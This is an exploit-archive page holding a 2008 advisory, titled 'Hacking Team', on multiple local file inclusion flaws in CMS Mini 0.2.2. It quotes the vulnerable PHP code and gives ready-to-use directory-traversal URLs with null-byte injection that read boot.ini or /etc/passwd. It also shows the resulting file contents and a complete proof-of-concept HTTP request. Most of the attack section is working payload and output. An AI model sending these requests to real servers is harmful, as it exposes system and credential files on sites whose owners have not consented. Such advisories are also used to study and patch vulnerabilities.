cmsmini-lfi.txt

cmsmini-lfi.txt: Posted Jun 23, 2008; Authored by CWH Underground | Site citecclub.org; CMS Mini version 0.2.2 suffers fro multiple local file inclusion vulnerabilities.; tags | exploit, local, vulnerability, file inclusion; MD5 | 6646d65d3f4a1a63fa056b66d42eaa99; Download | Favorite | Comments (0)

cmsmini-lfi.txt

=====================================================
  CMS Mini 0.2.2 Local File Inclusion Vulnerability
=====================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O  .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 22 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : CMS Mini
 VERSION     : 0.2.2
 VENDOR       : http://www.cmsmini.it/
 DOWNLOAD    : http://downloads.sourceforge.net/cmsmini
#####################################################

--- Local File Inclusion ---

----------------------------
 Vulnerable File [view/index.php]
----------------------------

@Line 5

   20:  if( !is_dir('../pages') ) header("location: ../admin/login.php");
   21:
   22:  $path = $_GET['path'];
   23:  $p = $_GET['p'];
   24:  $msg = $_GET['msg'];
   25:  $pext = strrchr($p, '.');
   26:  if( $path )
   27:  $dirpath = '../pages/'.$path;
   28:  else
   29:  $dirpath = '../pages';


---------
 Exploit
---------
[+] http://[Target]/[cmsmini_path]/view/?path=../../../../../../../../boot.ini%00&p=index.html
[+] http://[Target]/[cmsmini_path]/view/?path=cwh&p=../../../../../../../../boot.ini%00.html

    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS.

-------------
 POC Exploit
-------------

[+] GET http://192.168.24.25/cmsmini/view/?path=../../../../../../../../../../boot.ini%00&p=index.html HTTP/1.1
[+] Host: 192.168.24.25
[+] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
[+] Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
[+] Accept-Language: en-us,en;q=0.5
[+] Accept-Encoding: gzip,deflate
[+] Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
[+] Keep-Alive: 300
[+] Proxy-Connection: keep-alive


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
HP 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

cmsmini-lfi.txt

cmsmini-lfi.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

cmsmini-lfi.txt

Share This

cmsmini-lfi.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems